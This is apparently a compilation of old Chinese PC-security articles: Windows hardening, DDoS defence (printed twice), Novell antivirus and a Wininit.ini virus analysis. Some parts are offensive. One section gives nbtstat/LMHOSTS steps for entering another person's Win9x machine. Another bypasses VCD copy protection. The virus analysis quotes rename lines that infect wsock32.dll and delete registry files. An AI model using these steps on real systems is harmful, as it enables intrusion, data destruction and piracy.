    对于服务器和主机来说，一般只安装TCP/IP协议就够了。鼠标右击“网络邻居”，选择“属性”，再鼠标右击“本地连接”，选择“属性”，卸载不必要的协议。其中NETBIOS是很多安全缺陷的根源，对于不需要提供文件和打印共享的主机，还可以将绑定在TCP/IP协议的NETBIOS关闭，避免针对NETBIOS的攻击。选择“TCP/IP协议/属性/高级”，进入“高级TCP/IP设置”对话框，选择“WINS”标签，勾选“禁用TCP/IP上的NETBIOS”一项，关闭NETBIOS。

    2.关闭“文件和打印共享”

    文件和打印共享应该是一个非常有用的功能，但在不需要它的时候，也是黑客入侵的很好的安全漏洞。所以在没有必要“文件和打印共享”的情况下，我们可以将它关闭。用鼠标右击“网络邻居”，选择“属性”，然后单击“文件和打印共享”按钮，将弹出的“文件和打印共享”对话框中的两个复选框中的钩去掉即可。

    虽然“文件和打印共享”关闭了，但是还不能确保安全，还要修改注册表，禁止它人更改“文件和打印共享”。打开注册表编辑器，选择“HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\NetWork”主键，在该主键下新建DWORD类型的键值，键值名为“NoFileSharingControl”，键值设为“1”表示禁止这项功能，从而达到禁止更改“文件和打印共享”的目的；键值为“0”表示允许这项功能。这样在“网络邻居”的“属性”对话框中“文件和打印共享”就不复存在了。

    3.把Guest账号禁用

    有很多入侵都是通过这个账号进一步获得管理员密码或者权限的。如果不想把自己的计算机给别人当玩具，那还是禁止的好。打开控制面板，双击“用户和密码”，单击“高级”选项卡，再单击“高级”按钮，弹出本地用户和组窗口。在Guest账号上面点击右键，选择属性，在“常规”页中选中“账户已停用”。另外，将Administrator账号改名可以防止黑客知道自己的管理员账号，这会在很大程度上保证计算机安全。

    4.禁止建立空连接

    在默认的情况下，任何用户都可以通过空连接连上服务器，枚举账号并猜测密码。因此，我们必须禁止建立空连接。方法有以下两种：

    方法一是修改注册表：打开注册表“HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\LSA”，将DWORD值“RestrictAnonymous”的键值改为“1”即可。

    最后建议大家给自己的系统打上补丁，微软那些没完没了的补丁还是很有用的！

    四、隐藏IP地址

    黑客经常利用一些网络探测技术来查看我们的主机信息，主要目的就是得到网络中主机的IP地址。IP地址在网络安全上是一个很重要的概念，如果攻击者知道了你的IP地址，等于为他的攻击准备好了目标，他可以向这个IP发动各种进攻，如DoS(拒绝服务)攻击、Floop溢出攻击等。隐藏IP地址的主要方法是使用代理服务器。

    与直接连接到Internet相比，使用代理服务器能保护上网用户的IP地址，从而保障上网安全。代理服务器的原理是在客户机（用户上网的计算机）和远程服务器（如用户想访问远端WWW服务器）之间架设一个“中转站”，当客户机向远程服务器提出服务要求后，代理服务器首先截取用户的请求，然后代理服务器将服务请求转交远程服务器，从而实现客户机和远程服务器之间的联系。很显然，使用代理服务器后，其它用户只能探测到代理服务器的IP地址而不是用户的IP地址，这就实现了隐藏用户IP地址的目的，保障了用户上网安全。提供免费代理服务器的网站有很多，你也可以自己用代理猎手等工具来查找。

    五、关闭不必要的端口

    黑客在入侵时常常会扫描你的计算机端口，如果安装了端口监视程序（比如Netwatch），该监视程序则会有警告提示。如果遇到这种入侵，可用工具软件关闭用不到的端口，比如，用“Norton Internet Security”关闭用来提供网页服务的80和443端口，其他一些不常用的端口也可关闭。

    六、更换管理员帐户

    Administrator帐户拥有最高的系统权限，一旦该帐户被人利用，后果不堪设想。黑客入侵的常用手段之一就是试图获得Administrator帐户的密码，所以我们要重新配置Administrator帐号。

    首先是为Administrator帐户设置一个强大复杂的密码，然后我们重命名Administrator帐户，再创建一个没有管理员权限的Administrator帐户欺骗入侵者。这样一来，入侵者就很难搞清哪个帐户真正拥有管理员权限，也就在一定程度上减少了危险性。

    七、杜绝Guest帐户的入侵

    Guest帐户即所谓的来宾帐户，它可以访问计算机，但受到限制。不幸的是，Guest也为黑客入侵打开了方便之门！网上有很多文章中都介绍过如何利用Guest用户得到管理员权限的方法，所以要杜绝基于Guest帐户的系统入侵。

    禁用或彻底删除Guest帐户是最好的办法，但在某些必须使用到Guest帐户的情况下，就需要通过其它途径来做好防御工作了。首先要给Guest设一个强壮的密码，然后详细设置Guest帐户对物理路径的访问权限。举例来说，如果你要防止Guest用户可以访问tool文件夹，可以右击该文件夹，在弹出菜单中选择“安全”标签，从中可看到可以访问此文件夹的所有用户。删除管理员之外的所有用户即可。或者在权限中为相应的用户设定权限，比方说只能“列出文件夹目录”和“读取”等，这样就安全多了。

    八、安装必要的安全软件

    我们还应在电脑中安装并使用必要的防黑软件，杀毒软件和防火墙都是必备的。在上网时打开它们，这样即便有黑客进攻我们的安全也是有保证的。

    九、防范木马程序

    木马程序会窃取所植入电脑中的有用信息，因此我们也要防止被黑客植入木马程序，常用的办法有：

    ● 在下载文件时先放到自己新建的文件夹里，再用杀毒软件来检测，起到提前预防的作用。

    ● 在“开始”→“程序”→“启动”或“开始”→“程序”→“Startup”选项里看是否有不明的运行项目，如果有，删除即可。

    ● 将注册表里 HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run下的所有以“Run”为前缀的可疑程序全部删除即可。

    十、不要回陌生人的邮件

    有些黑客可能会冒充某些正规网站的名义，然后编个冠冕堂皇的理由寄一封信给你要求你输入上网的用户名称与密码，如果按下“确定”，你的帐号和密码就进了黑客的邮箱。所以不要随便回陌生人的邮件，即使他说得再动听再诱人也不上当。

    做好IE的安全设置

    ActiveX控件和 Applets有较强的功能，但也存在被人利用的隐患，网页中的恶意代码往往就是利用这些控件编写的小程序，只要打开网页就会被运行。所以要避免恶意网页的攻击只有禁止这些恶意代码的运行。IE对此提供了多种选择，具体设置步骤是：“工具”→“Internet选项”→“安全”→“自定义级别”，建议您将ActiveX控件与相关选项禁用。谨慎些总没有错！

    另外，在IE的安全性设定中我们只能设定Internet、本地Intranet、受信任的站点、受限制的站点。不过，微软在这里隐藏了“我的电脑”的安全性设定，通过修改注册表把该选项打开，可以使我们在对待ActiveX控件和 Applets时有更多的选择，并对本地电脑安全产生更大的影响。

    下面是具体的方法：打开“开始”菜单中的“运行”，在弹出的“运行”对话框中输入Regedit.exe，打开注册表编辑器，点击前面的“+”号顺次展开到：HKEY_CURRE-NT_USER\Software\Microsoft\Windows\CurrentVersion\InternetSettings\Zones\0，在右边窗口中找到DWORD值“Flags”，默认键值为十六进制的21(十进制33)，双击“Flags”，在弹出的对话框中将它的键值改为“1”即可，关闭注册表编辑器。无需重新启动电脑，重新打开IE，再次点击“工具→Internet选项→安全”标签，你就会看到多了一个“我的电脑”图标，在这里你可以设定它的安全等级。将它的安全等级设定高些，这样的防范更严密。


DDoS攻击的趋势与防御策略

《一键清理系统垃圾》

DDoS攻击的趋势与防御策略

    一、阻断服务(Denial of Service)

      在探讨 DDoS 之前我们需要先对 DoS 有所了解，DoS泛指黑客试图妨碍正常使用者使用网络上的服务，例如剪断大楼的电话线路造成用户无法通话。而以网络来说，由于频宽、网络设备和服务器主机等处理的能力都有其限制，因此当黑客产生过量的网络封包使得设备处理不及，即可让正常的使用者无法正常使用该服务。例如黑客试图用大量封包攻击一般频宽相对小得多的拨接或 ADSL 使用者，则受害者就会发现他要连的网站连不上或是反应十分缓慢。

    DoS 攻击并非入侵主机也不能窃取机器上的资料，但是一样会造成攻击目标的伤害，如果攻击目标是个电子商务网站就会造成顾客无法到该网站购物。

    二、分布式阻断服务(Distributed Denial of Service)

    DDoS 则是 DoS 的特例，黑客利用多台机器同时攻击来达到妨碍正常使用者使用服务的目的。黑客预先入侵大量主机以后，在被害主机上安装 DDoS 攻击程控被害主机对攻击目标展开攻击；有些 DDoS 工具采用多层次的架构，甚至可以一次控制高达上千台电脑展开攻击，利用这样的方式可以有效产生极大的网络流量以瘫痪攻击目标。早在2000年就发生过针对Yahoo, eBay, Buy.com 和 CNN 等知名网站的DDoS攻击，阻止了合法的网络流量长达数个小时。

    DDoS 攻击程序的分类，可以依照几种方式分类，以自动化程度可分为手动、半自动与自动攻击。早期的 DDoS 攻击程序多半属于手动攻击，黑客手动寻找可入侵的计算机入侵并植入攻击程序，再下指令攻击目标；半自动的攻击程序则多半具有 handler 控制攻击用的agent 程序，黑客散布自动化的入侵工具植入 agent 程序，然后使用 handler 控制所有agents 对目标发动 DDoS 攻击；自动攻击更进一步自动化整个攻击程序，将攻击的目标、时间和方式都事先写在攻击程序里，黑客散布攻击程序以后就会自动扫描可入侵的主机植入 agent 并在预定的时间对指定目标发起攻击，例如近期的 W32/Blaster 网虫即属于此类。

    若以攻击的弱点分类则可以分为协议攻击和暴力攻击两种。协议攻击是指黑客利用某个网络协议设计上的弱点或执行上的 bug 消耗大量资源，例如 TCP SYN 攻击、对认证伺服器的攻击等；暴力攻击则是黑客使用大量正常的联机消耗被害目标的资源，由于黑客会准备多台主机发起 DDoS 攻击目标，只要单位时间内攻击方发出的网络流量高于目标所能处理速度，即可消耗掉目标的处理能力而使得正常的使用者无法使用服务。

    若以攻击频率区分则可分成持续攻击和变动频率攻击两种。持续攻击是当攻击指令下达以后，攻击主机就全力持续攻击，因此会瞬间产生大量流量阻断目标的服务，也因此很容易被侦测到；变动频率攻击则较为谨慎，攻击的频率可能从慢速渐渐增加或频率高低变化，利用这样的方式延缓攻击被侦测的时间。

    三、从 DDoS 攻击下存活

    那么当遭受 DDoS 攻击的时候要如何设法存活并继续提供正常服务呢？由先前的介绍可以知道，若黑客攻击规模远高于你的网络频宽、设备或主机所能处理的能力，其实是很难以抵抗攻击的，但仍然有一些方法可以减轻攻击所造成的影响。

    首先是调查攻击来源，由于黑客经由入侵机器进行攻击，因此你可能无法查出黑客是由哪里发动攻击，我们必须一步一步从被攻击目标往回推，先调查攻击是由管辖网络的哪些边界路由器进来，上一步是外界哪台路由器，连络这些路由器的管理者(可能是某个ISP或电信公司)并寻求他们协助阻挡或查出攻击来源，而在他们处理之前可以进行哪些处理呢?

    如果被攻击的目标只是单一 ip，那么试图改个 ip 并更改其 DNS mapping 或许可以避开攻击，这是最快速而有效的方式；但是攻击的目的就是要使正常使用者无法使用服务，更改ip的方式虽然避开攻击，以另一角度来看黑客也达到了他的目的。此外，如果攻击的手法较为单纯，可以由产生的流量找出其规则，那么利用路由器的 ACLs(Access Control Lists)或防火墙规则也许可以阻挡，若可以发现流量都是来自同一来源或核心路由器，可以考虑暂时将那边的流量挡起来，当然这还是有可能将正常和异常的流量都一并挡掉，但至少其它来源可以得到正常的服务，这有时是不得已的牺牲。如果行有余力，则可以考虑增加机器或频宽作为被攻击的缓冲之用，但这只是治标不治本的做法。最重要的是必须立即着手调查并与相关单位协调解决。

    四、预防DDoS攻击

    DDoS 必须透过网络上各个团体和使用者的共同合作，制定更严格的网络标准来解决。每台网络设备或主机都需要随时更新其系统漏洞、关闭不需要的服务、安装必要的防毒和防火墙软件、随时注意系统安全，避免被黑客和自动化的 DDoS 程序植入攻击程序，以免成为黑客攻击的帮凶。

    有些 DDoS 会伪装攻击来源，假造封包的来源 ip，使人难以追查，这个部份可以透过设定路由器的过滤功能来防止，只要网域内的封包来源是其网域以外的 ip，就应该直接丢弃此封包而不应该再送出去，如果网管设备都支持这项功能，网管人员都能够正确设定过滤掉假造的封包，也可以大量减少调查和追踪的时间。

    网域之间保持联络是很重要的，如此才能有效早期预警和防治 DDoS 攻击，有些 ISP会在一些网络节点上放置感应器侦测突然的巨大流量，以提早警告和隔绝 DDoS 的受害区域，降低顾客的受害程度。

作者：黑鹰基地
来源：eNet硅谷动力


DDoS攻击的趋势与相关防御策略

《一键清理系统垃圾》

DDoS攻击的趋势与相关防御策略

一、阻断服务（Denial of Service）

在探讨 DDoS 之前我们需要先对 DoS 有所了解，DoS泛指黑客试图妨碍正常使用者使用网络上的服务，例如剪断大楼的电话线路造成用户无法通话。而以网络来说，由于频宽、网络设备和服务器主机等处理的能力都有其限制，因此当黑客产生过量的网络封包使得设备处理不及，即可让正常的使用者无法正常使用该服务。例如黑客试图用大量封包攻击一般频宽相对小得多的拨接或 ADSL 使用者，则受害者就会发现他要连的网站连不上或是反应十分缓慢。

DoS 攻击并非入侵主机也不能窃取机器上的资料，但是一样会造成攻击目标的伤害，如果攻击目标是个电子商务网站就会造成顾客无法到该网站购物。

二、分布式阻断服务（Distributed Denial of Service）

DDoS 则是 DoS 的特例，黑客利用多台机器同时攻击来达到妨碍正常使用者使用服务的目的。黑客预先入侵大量主机以后，在被害主机上安装 DDoS 攻击程控被害主机对攻击目标展开攻击；有些 DDoS 工具采用多层次的架构，甚至可以一次控制高达上千台电脑展开攻击，利用这样的方式可以有效产生极大的网络流量以瘫痪攻击目标。早在2000年就发生过针对Yahoo, eBay, Buy.com 和 CNN 等知名网站的DDoS攻击，阻止了合法的网络流量长达数个小时。

DDoS 攻击程序的分类，可以依照几种方式分类，以自动化程度可分为手动、半自动与自动攻击。早期的 DDoS 攻击程序多半属于手动攻击，黑客手动寻找可入侵的计算机入侵并植入攻击程序，再下指令攻击目标；半自动的攻击程序则多半具有 handler 控制攻击用的agent 程序，黑客散布自动化的入侵工具植入 agent 程序，然后使用 handler 控制所有agents 对目标发动 DDoS 攻击；自动攻击更进一步自动化整个攻击程序，将攻击的目标、时间和方式都事先写在攻击程序里，黑客散布攻击程序以后就会自动扫描可入侵的主机植入 agent 并在预定的时间对指定目标发起攻击，例如近期的 W32/Blaster 网虫即属于此类。

若以攻击的弱点分类则可以分为协议攻击和暴力攻击两种。协议攻击是指黑客利用某个网络协议设计上的弱点或执行上的 bug 消耗大量资源，例如 TCP SYN 攻击、对认证伺服器的攻击等；暴力攻击则是黑客使用大量正常的联机消耗被害目标的资源，由于黑客会准备多台主机发起 DDoS 攻击目标，只要单位时间内攻击方发出的网络流量高于目标所能处理速度，即可消耗掉目标的处理能力而使得正常的使用者无法使用服务。

若以攻击频率区分则可分成持续攻击和变动频率攻击两种。持续攻击是当攻击指令下达以后，攻击主机就全力持续攻击，因此会瞬间产生大量流量阻断目标的服务，也因此很容易被侦测到；变动频率攻击则较为谨慎，攻击的频率可能从慢速渐渐增加或频率高低变化，利用这样的方式延缓攻击被侦测的时间。

三、从 DDoS 攻击下存活

那么当遭受 DDoS 攻击的时候要如何设法存活并继续提供正常服务呢？由先前的介绍可以知道，若黑客攻击规模远高于你的网络频宽、设备或主机所能处理的能力，其实是很难以抵抗攻击的，但仍然有一些方法可以减轻攻击所造成的影响。

首先是调查攻击来源，由于黑客经由入侵机器进行攻击，因此你可能无法查出黑客是由哪里发动攻击，我们必须一步一步从被攻击目标往回推，先调查攻击是由管辖网络的哪些边界路由器进来，上一步是外界哪台路由器，连络这些路由器的管理者（可能是某个ISP或电信公司）并寻求他们协助阻挡或查出攻击来源，而在他们处理之前可以进行哪些处理呢?

如果被攻击的目标只是单一 ip，那么试图改个 ip 并更改其 DNS mapping 或许可以避开攻击，这是最快速而有效的方式；但是攻击的目的就是要使正常使用者无法使用服务，更改ip的方式虽然避开攻击，以另一角度来看黑客也达到了他的目的。此外，如果攻击的手法较为单纯，可以由产生的流量找出其规则，那么利用路由器的 ACLs（Access Control Lists）或防火墙规则也许可以阻挡，若可以发现流量都是来自同一来源或核心路由器，可以考虑暂时将那边的流量挡起来，当然这还是有可能将正常和异常的流量都一并挡掉，但至少其它来源可以得到正常的服务，这有时是不得已的牺牲。如果行有余力，则可以考虑增加机器或频宽作为被攻击的缓冲之用，但这只是治标不治本的做法。最重要的是必须立即着手调查并与相关单位协调解决。

四、预防DDoS攻击

DDoS 必须透过网络上各个团体和使用者的共同合作，制定更严格的网络标准来解决。每台网络设备或主机都需要随时更新其系统漏洞、关闭不需要的服务、安装必要的防毒和防火墙软件、随时注意系统安全，避免被黑客和自动化的 DDoS 程序植入攻击程序，以免成为黑客攻击的帮凶。

有些 DDoS 会伪装攻击来源，假造封包的来源 ip，使人难以追查，这个部份可以透过设定路由器的过滤功能来防止，只要网域内的封包来源是其网域以外的 ip，就应该直接丢弃此封包而不应该再送出去，如果网管设备都支持这项功能，网管人员都能够正确设定过滤掉假造的封包，也可以大量减少调查和追踪的时间。

网域之间保持联络是很重要的，如此才能有效早期预警和防治 DDoS 攻击，有些 ISP会在一些网络节点上放置感应器侦测突然的巨大流量，以提早警告和隔绝 DDoS 的受害区域，降低顾客的受害程度。


Novell网如何防毒

《一键清理系统垃圾》

Novell网如何防毒

    Novell网络本身具有一套较为完善的网络安全体系，如可设定目录登录限制、目录最大权限、信任者权限、文件属性等，这在一定范围内为服务器文件与数据提供了保护。另外，PC DOS系统的一些中断向量也被网络操作系统的中断向量所取代，这使得不少在PC上猖獗的单机病毒不能在Novell网上传播。消除或限制网络病毒的破坏作用，首先应防止网络服务器受病毒的感染。为此可采取如下措施。
    l．将网络服务器的整个硬盘划分为NetWare分区。用系统软盘启动网络服务器。实践证明，此方法虽然启动速度稍慢，但数据安全性好得多。
    2．多用无盘工作站。少用有盘工作站，使用无盘工作站后，用户将不能从网络服务器上装入或卸出文件、而只能执行服务器上的文件，这就减少了病毒从工作站侵入网络的机会。网络中一般有两个有盘工作站即可，一个给系统管理员使用，另一个提供给用户作文件装入与拷贝用。
    3．规定用户的访问权限，尽可能少用超级用户登录。对普通用户，不应允许其具有对其他用户目录的浏览和访问权力，以防止用户通过拷贝他人可能已被病毒感染的文件，将网络病毒传至自己目录中的文件上来。超级用户减少，具有访问整个服务器全部目录能力的使用者就减少，使系统文件感染的机会也就会越少，这就能增大整个网络的工作安全性。只有在必要时才授权给某一用户，使其在某目录中有超级用户权和存取控制权。一般不应允许多个用户对同一目录具有读／写权力，以防网络病毒的交叉感染。若必须使多个用户以读／写权力存／取同一目录，则应通告用户不能在共享目录下放置可执行文件。在组目录中一般只放置数据文件，尽量不把共享可执行文件放在组目录中。
    4．加强系统管理，提高网络系统的操作安全性。对于公用目录中的系统文件和工具软件，要设置其力只读属性，对系统程序所在的目录不授予修改权和管理权。这样，病毒就无法对系统程序实施感染和寄生，其他用户也不会受到病毒感染。也可利用网络设置软件对各工作站分别规定应访问共享区的存取权限、口令字等，使共享区的文件和数据不会被意外删除或破坏。
    5．工作站是网络的入口，只要将此入口管好就能有效地防止病毒的入侵。因此，可采用固化有防／杀病毒软件的卡或芯片，将其安装在网络工作站上，这样就可经常地保护工作站及其通往服务器的路径，从而拦截病毒对网络的入侵。也可将工作地的存／取控制与病毒防护合二为一，起到防止病毒入侵的作用。
     下面以KILL for NetWare为例介绍Novell网络防病毒方案：
    KILL for NetWare是Novell网络上的防病毒解决方案，它采用服务器／工作站的架构，对Novell网络实行了从服务器到工作站的全方位的防病毒保护。
    网络环境：Novell NetWare 4．11；服务器数量：3台；DOS工作站：10台；Windows 3．x工作站：45台；Windows 95／98工作站：13台。
    该系统的反病毒工作主要包含下列几项任务：
    （1）服务器本身的防护：实时／实时防护；
    （2）工作站端的防护：DOS／Windows 3．x／Windows 95／98客户端；
    （3）Internet／Intranet及信息系统的防护，防毒墙；
    （4）系统集中统一的域管理功能；
    （5）无毒备份系统的实现。
     建立Novell网防毒体系
    （1）购买并安装3个KILL for NetWare Server软件，从而实现对于三台服务器设备的防护（可利用KILLforNetWareServer的远程安装功能）。
    （2）在所有的工作站上均安装KILL for DOS／Windows 3．x客户端软件，以实现客户端的包含实时功能（不含Windows 95／98客户端）在内的防病毒功能。同时购买13个KILL for Desktop版软件，将其中的KILL for Windows 95／98软件安装到13个Windows 95客户端，以实现Windows 95工作站上的实时功能。
    （3）启动信息系统服务器的实时监控功能，建立对于Internet／Intranet及信息系统的防毒墙功能。
    （4）从任何一台工作站以管理员身份登录到系统上，实现对于NetWare服务器的域管理功能。
    （5）开启备份工作站的实时监控功能，实现对于系统数据库的无毒备份。

返回


VCD 加密破解

《一键清理系统垃圾》

VCD 加密破解

这种VCD光盘都不能在电脑CD光驱上看，通过设备管理器进入也不能显示任何文件。就算能看也只有一面可以。下面我就介绍一种VCD加密技术和破解方法。简单，狠毒！

   人工光盘坏道目前最新最常用的加密方法，原理是该VCD带防盗圈，这个圈的作用是在光头读盘到防盗圈处时是个坏道，从物理上让光驱读不过去，你会发现光盘可以显示容量，但打开目录却没有任何文件，市面上的最新VCD都是采用这种加密方法。象我想拷的正版神勇铁金刚，无间道3就是这种方法。

    安装豪杰解霸3000零售版或者豪杰超级解霸8.0完全安装。其实任何版本的豪杰解霸可以，其实只要其中的一个工具“MP3数字CD抓轨”，打开之，放入加密光盘。打开软件，找到VCD所在的光驱，选择轨道中最大的那个文件，在确定你要保存文件的路径。其他的选择就自己看着办吧，嘿嘿。OK！点击“开始读取”，稍等几分钟。

    完毕，打开你保存的文件目录，会发现有个后缀名为.RAW的文件，那就是你要看的有图像、有声音的VCD了，看吧！用Windows Media Player。
有零工作室　www.you0.com www.you0.net联系QQ 3149886


WIN9X下的入侵方法

《一键清理系统垃圾》

WIN9X下的入侵方法

   WIN9X下的入侵方法

   黑客已经成为一种文化，很多人想成为黑客，他们偶尔学到了几种小花招，总喜欢拿别人开玩笑，搞些恶作剧。其实黑客的最高境界在于防守，不在于进攻。所谓明枪易躲暗箭难防，要防住他人所有的进攻，肯定需要懂得比对方更多的系统知识，了解更多的系统漏洞，及如何弥补漏洞。

   现在满天都是黑客教程，但真正有用的不多，下面介绍一种WIN9X下的入侵方法：

1.取得对方IP地址如XX.XX.XX.XX，方法太多不细讲了。

2.判断对方上网的地点，开个DOS窗口键入 TRACERT XX.XX.XX.XX

第4和第5行反映的信息既是对方的上网地点。

3.得到对方电脑的名称，开个DOS窗口键入 NBTSTAT -A XX.XX.XX.XX

第一行是对方电脑名称

第二行是对方电脑所在工作组

第三行是对方电脑的说明

4.在Windows目录下有一文件名为LMHOSTS.SAM，将其改名为LMHOSTS，删除其内容，将对方的IP及电脑名按以下格式写入文件：

XX.XX.XX.XX 电脑名

5.开DOS窗口键入 NBTSTAT -R

6.在开始-查找-电脑中输入对方电脑名，出现对方电脑点击即可进入。

以上方法请不要乱用，本人对你用上面的方法所惹出的麻烦概不负责，请慎重。

对付上面进攻的最好办法就是隐藏你的IP地址。


Wininit.ini文件与Windows 病毒

《一键清理系统垃圾》

Wininit.ini文件与Windows 病毒

    用过Windows 9x的人都见过如下的提示信息：
    Please wait while Setup updates your configuration files.
    This may take a few minutes……
    这是安装完某个软件或者硬件的驱动程序，应安装程序的要求重新启动Windows后的正常现象，绝不会把它与病毒联系起来，本文将用事实告诫你，如果你的机器启动时无缘无故地出现上述信息，就要赶紧去找最新的杀毒软件了！
    这时Windows在干什么呢？实际上它在执行Wininit.ini给出的指令，Wininit.ini是一个鲜为人知的文件，主要用于删除、更名和更新在Windows运行时不能被施以这些操作的文件，它存在的时间很短，所以显得有点神秘。

     一、Wininit文件工作机
    众所周知，在Windows中，一个可执行文件如果正在运行或某个库文件（*.dll、*.vxd、*.sys等）正在被打开使用，则不能被改写或删除。例如，你不可能在资源管理器中删除\Windows\explorer.exe，而在Windows的GDI界面下，有一些文件一直处于这种状态下，除explorer.exe外，还有显示驱动程序库文件，文件子系统库文件等，如果我们要对这些文件进行升级，改动，就必须在Windows保护模式核心启动前进行，于是Windows就提供了基于Wininit.ini文件的一个机制来完成这个任务，这个机制是，要删除或改写这类文件的应用程序按一定的格式把命令写入 Wininit.ini。Windows在重启时，将在Windows目录下搜索Wininit.ini文件，如果找到，就遵照该文件指令删除、改名、更新文件，完成任务后，将删除Wininit.ini文件本身，继续启动过程。所以Wininit.ini文件中的指令只会被执行一次，列目录时也通常没有它的踪影。
    Wininit.ini文件的格式简述如下：
    Windows 95 Resource Kit提到Wininit.ini文件有三个可能的段，但只叙述了“rename”段的用法，虽然名为“rename”，却可实现删除、改名、更新文件的功能。其格式为：
    [rename]
    ……
    filename1=filename2
    ……
    行“filename1=filename2”相当于依次执行“copy filename2 filename1”及“del filename2”这两个DOS命令。
    启动时，Windows将用filename2覆盖filename1，再删除filename2，这就实现了用filename2与更新filename1的目的，如果filename1不存在，实际结果是将filename2改名为filename1；如果要删除文件，可令filename1为nul，例如：
    [rename]
    ……
    nul=filename2
    ……
    将删除filename2。
    以上文件名都必须包含完整路径，注意:由于Wininit.ini文件的处理是在Windows文件系统调入前，所以不支持长文件名。
    Wininit.ini的应用很多，除了经常在软硬件的安装程序中用到外，还有软硬件的卸载程序中用到，比如：假设你要为自己的软件编写一个卸载程序，这个卸载程序本身是不可能被自己删除的，因为它试图删除自身时，自身却正在运行。为了清除卸载程序本身，你就得借助于Wininit.ini文件。顺便提一句，在安装Windows的最后阶段，就是利用Wininit.ini文件来清除和更名被安装程序SETUP自身使用的文件。

     二、该技术在新的Winodws病毒中流行
    微机操作平台已经成了从DOS平台到Windows平台转移，不幸的是，大量出现的Windows 9x病毒标志着病毒也同样完成了这个转移。
    Windows病毒在感染文件时，也碰到了这样一个问题，某些文件，因为系统正在使用，不能被改写和 感染，早期的Windows病毒如CIH病毒采用VXD技术来解决这个问题，这易造成系统不稳定，后期的病毒大多采用Windows提供的标准方法——Wininit.ini文件来解决这个问题，比如以下几种新出现的Windows病毒。

    1、Win32.Kriz
   该病毒又叫圣诞节病毒，内存驻留型，具有多形性且极端危险，在12月25日发作时将改写CMOS，覆盖所有驱动器上的所有文件，然后用CIH病毒中的同样程序破坏主板上Flash BIOS，该病毒感染*.EXE（PE格式）和*.scr文件，同时为了监控所有文件操作，它感染Kernel32.dll，接管文件复制、打开、移动等文件存取函数，由于kernel32.dll文件在Windows运行时只能以只读方式打开，为感染它，该病毒将它复制一份，名为KRIZEO.TT6，然后感染复制品KRIZEO,TT6，写Rename指令到Wininit.ini文件中，下次机器启动时，KRIZEO.TT6将替代原来的Kernel32.dll完成感染。

    2、Supp1.A蠕虫
    这是一个Word宏蠕虫，通过在发出的E-mail中插入一个特洛伊文档作为附件传播，当被打开时病毒拷贝文档到Anthrax.ini，把要展开的数据写到文件dll.lzh，并解压为dll.tmp，以上文件都放在Windows目录下。下一步这个蠕虫创建一个具有如下内容的Wininit.ini文件。
    [rename]
    nul=c:\windows\dll.lzh
    c:\windows\system\wsock33.dll=c:\windows\system\wsock32.dll
    c:\windows\system\wsock32.dll=c:\windows\dll.tmp
    第一行是删除dll.lzh，第二行是把原wsock32.dll改名为wsock32.dll。下一步启动时，这些指令将生效。这样wsock32.dll就被感染了。利用它，蠕虫就可监控外发邮件，一旦发现外发邮件，蠕虫就自动把特洛伊木马文档作为附件加到该邮件中进行传播，感染7天后，该病毒将把硬盘上所有以DOC、XLS、TXT、RTF、ZIP、ARJ、RAR为扩展名的文件长度置为0，从而破坏所有的数据文件。

     3、Heathen病毒
    多平台病毒，感染Word文档和PE格式EXE文件。为了感染explorer.exe，病毒先把explorer.exe复制为heathen.vex，然后加一条“rename”指令到Wininit.ini文件，例如：
    [rename]
    c:\windows\explorer.exe=c:\windows\heathen.vex
    下次启动时，Windows将帮助它完成对Explorer.exe的感染。另外，该病毒发作时也使Wininit.ini来删除Windows注册表文件。
    [rename]
    nul=c:\windows\system.dat
    nul=c:\windows\user.dat
    nul=c:\windows\system.da0
    nul=c:\windows\user.da0

    4、Win95.SK
    这是最凶狠、最狡猾的病毒之一了，原有一些BUG，现在已出现了更新版本，纠正了第一个版本中的所有BUG。它是一个寄生性的Windows病毒，可感染Windows PE格式文件、HLP帮助文件、压缩包文件（RAR、XIP、ARJ、HA）。它采用了许多新的高级技术，如：自身加解密技术，入口点隐藏技术等，当磁盘上文件被访问时，它检查其文件名，如果是几个反病毒程序的名字（DINF、AVPI、AVP、VBA、DRWEB），该病毒将删除从C：盘到Z：盘的所有目录下的所有能被删除的文件，然后，调用函数Fatal_Error_Handler使系统死机。
    Windows Shell文件explorer.exe是Windows病毒必争之地，该病毒自然不会放过，但比其它病毒更加完善，它通过从system.ini文件中的“shell=”行来获得Shell文件名，这样，即使你将explorer.exe改名，在Shell中指定实际的文件名，期望借此避免被感染，也是徒劳，它感染Shell文件的具体步骤是：以explorer.exe为例，把explorer.exe复制为explorer.exf，然后感染explorer.exf、再创建Wininit.ini文件，写入合适的Rename指令，这与其它病毒的作法如出一辙。
    由于上述原因，一些实时病毒监控软件已把Wininit.ini文件列为重点监控对象。

    三、采用Wininit.ini彻底杀除病毒
    在Windows平台下杀病毒，会碰到类似问题。如何清除正在运行或处于打开状态的染毒文件中的病毒？了解了Wininit.ini文件的工作机制，我们可以这样来设计杀毒软件：在发现某个染毒文件因为正处于打开状态或执行状态而不能清除病毒时，可将其复制一份，并将复制品去毒。然后在Windows目录下创建一个Wininit.ini文件（创建之前要先查查Wininiti.ini文件是否存在），建立[rename]段，加入一行：染毒文件名=复制品文件名；继续清扫病毒，如果发现类似文件，可在[rename]下再添加一行即可，扫描完成后强烈建议用户重新启动或干脆强行重新启动，以便执行Wininiti.ini完成整个清毒过程。


在Windows XP中对文件进行加密

《一键清理系统垃圾》

在Windows XP中对文件进行加密

    在Windows XP中确实可以直接对文件(夹)进行加密，但是，这需要一个前提：要加密的文件(夹)所在的硬盘分区是NFTS格式的。如果你的硬盘分区不是NFTS格式，请进行操作转换后，再按下面的方法进行加密。

    选中需要加密的文件(夹)，右击鼠标键，在随后弹出的快捷菜单中，选“属性”选项，在“常规”标签中，按“高级”按钮打开“高级属性”对话框，选中其中的“加密内容以便保护数据”选项后，确定退出即可。

    特别需要提醒的是：如果用上述方法对文件(夹)进行了加密，以后重新安装系统之前，最好对它进行解密(解密与加密方法相似)操作，否则系统重装后，可能造成文件(夹)不能正常打开。


病毒从何而来

《一键清理系统垃圾》

病毒从何而来

《中国电脑教育报》

    有果必有因。无端端的，何来病毒？病毒其实大有来头。

    病毒是一种比较完美的、精巧严谨的代码，按照严格的秩序组织起来，与所在的系统网络环境相适应和配合起来，病毒不会通过偶然形成，并且需要有一定的长度，这个基本的长度从概率上来讲是不可能通过随机代码产生的。

